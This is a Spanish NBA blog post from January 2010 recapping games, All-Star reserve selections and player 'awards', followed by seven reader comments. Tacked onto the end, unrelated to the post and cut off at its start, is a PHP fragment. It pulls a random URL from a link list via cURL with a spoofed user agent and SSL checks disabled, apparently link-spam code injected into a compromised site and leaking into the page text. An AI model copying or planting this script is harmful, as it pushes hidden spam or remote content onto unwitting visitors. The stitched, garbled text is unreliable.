La Crónica (28/01/2010)

29 de January de 2010 por TheDeerHunter

Día señalado en el calendario. Además del gran menú baloncestístico se publicaban los reservas para el all-star elegidos por los entrenadores. Parece que la cordura se ha impuesto en mucha mayor medida que en el sufragio popular. Estos hombres serán de la partida:

ESTE: Rondo (1ª), Rose (1ª), Joe Johnson (4ª), Pierce (8ª), Gerald Wallace (1ª),  Bosh (5ª) y Horford (1ª), con alguna otra posible incorporación en el caso de que Garnett no juegue finalmente el partido.

OESTE: Chris Paul (3ª), Deron Williams (1ª),  Roy (3ª), Durant (1ª), Nowitzki (9ª), Zach Randolph (1ª) y Paaaau Gaaasol!!! (3ª)

Volviendo a la propia competición, anoche pudimos disfrutar de tres partidos impresionantes.

El más light a priori era la visita de los Raptors al Madison pero con la defensa de ambos había espectáculo asegurado, más si el partido se resuelve por la mínima. El mejor partido de Turkoglu desde que le fichó Collangelo. Muy bien acompañado por Bosh y por Calderón nuevamente desde el banco. Por los Knicks, reivindicación de David Lee. Perfectamente hubiera estado justificada su presencia en lugar de Horford… pero 27 derrotas son 27 derrotas. C’est la vie.

Después pudimos disfrutar de un Boston@Orlando precioso. Nada que ver con el anterior despropósito que nos brindaron. Los Celtics no pudieron aguantar una buena ventaja que amasaron en la primera parte. Los Magic se encomendaron a la vieja guardia: Howard-Lewis-Nelson. Eso es lo que deberían hacer más a menudo.

Por último, Steve Nash suele tener la sana costumbre de tocarle las narices a Cuban siempre que puede. No fue una gran idea que le dejaras marchar, Marc. Que después de tantos años al viejo base todavía le sobran narices para diseccionar a tu equipo… Estuvo letal.

PREMIOS:

MVP: Los viejos rockeros nunca mueren. Steve Nash 19 puntos, 11 asistencias y 4 rebotes, anotándolas de todos los colores en el momento más caliente. Creemos que su amigo Nowitzki, después de que Nash le rompió la cintura en la canasta de la victoria, estará de acuerdo con nosotros.

La sorpresa: Ya ni nos acordábamos de lo bueno que es Turkoglu cuando quiere. Ayer 26 puntos y 11 rebotes fundamentales para sacar la victoria del Madison.

La decepción: No estuvo del todo mal Amare Stoudamire… pero le dejaron sentado cuando su equipo se estaba jugando el partido. No podemos reprocharlo. Para jugarse las habichuelas hace falta implicación. Que Stat coja un sólo rebote en casi media hora de juego demuestra que no la tiene. Y es un descrédito muy grande para todo un ¿pívot? titular del all-star game.

El mayor esfuerzo en vano: Como contrapartida David Lee se marcó un 29-18 en la derrota de su equipo y creo que pocos protestaríamos si existiera la posibilidad de que Lee fuera al all-star en lugar de Stoudamire.

Comenta

7 comentarios a esta entrada

  1. Txusma dice:
    #1

    Nada que reprocharle a las elecciones en el Oeste y además siento una alegría inconmsurable por Deron Williams. Ya era hora.
    En el Este, me parece muy bien que el record del equipo pese tanto (de hecho, sino pesara tanto a lo mejor estaba Kaman en lugar de Gasol) pero yo me quedaba con Lee antes que con Horford y como contrapartida para los Hawks me llevaria a Josh Smith… Cómo? Q me sobra uno? No lo adivináis?

      Citar

  2. sergio dice:
    #2

    Totalmente de acuerdo contigo Txus…

    Nash esta jugando este año la mejor o 2ª mejor temporada, individualmente hablando, de su vida. Y no es ninguna tonteria para alguien que lleva 6 años por encima del 50% en tiros y del 42 % en triples. Partidazo de nuevo de David Lee aunque para mi sus numeros se ven inflados por el sistema de juego de NY y de que es practicamente el unico hombre alto puro del equipo. Por calidad real y tecnica creo q tampoco es un top 5 de los pivots. Al menos esa impresion me da..

      Citar

  3. Viva_Dirk dice:
    #3

    A mi el que no me convence es Rose, no creo que este haciendo una gran temporada, aunque sus últimos partidos si estan siendo buenísimos. Ojo que para mi es mejor jugador que Rondo y un superclase, pero esperaba mas de el este año.

      Citar

  4. Love Denise dice:
    #4

    De los reservas no me convencen ni Rose ni Horford;; Stephen Jackson y David Lee estan haciendo mejores campañas a mi parecer.

      Citar

  5. sergio dice:
    #5

    Los tres mejores jugadores por valoracion que no van al All-Star son Lee, Boozer y Marc Gasol…. da que pensar el trabajo que hace el mediano de los Gasol.

    Yo creo que Rose si que esta cumpliendo. Cerca del 20-4-6 con porcentajes correctos salvo en triples y encima en un equipo que es la antitesis estadistica de otros como NY o los Warriors. Y ademas llevan un 50 % de victorias que no esta mal del todo para ser el Este y a la misma altura que el año anterior. Y todo eso dentro de una leve pero continua mejoria segun avanza la temporada tanto para el equipo como para el.

    Lo de Horford chirria mucho mucho mucho… Josh Smith tiene mejores numeros, da mas espectaculo,…. y no creo que sea para “defender” a los pivots del Oeste porque no llevan ninguno…

    Tambien es cierto que no son muy dados a dar mas de 1 All-Star por equipo salvo a Boston y Lakers (solo Phoenix incumple la norma y es por la consabida regla de Stoudamire de center…)

      Citar

  6. Sr. Lagarto dice:
    #6

    David Lee creo que está infravalorado, un tío con un juego muy efectivo y sobrio…y con unos numerazos.

      Citar

  7. Txusma dice:
    #7

    A David Lee tengo ganas de verle el año q viene si sale de NY. Lejos del estilo de D’Antoni y en un equipo donde no sea la referencia interior…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>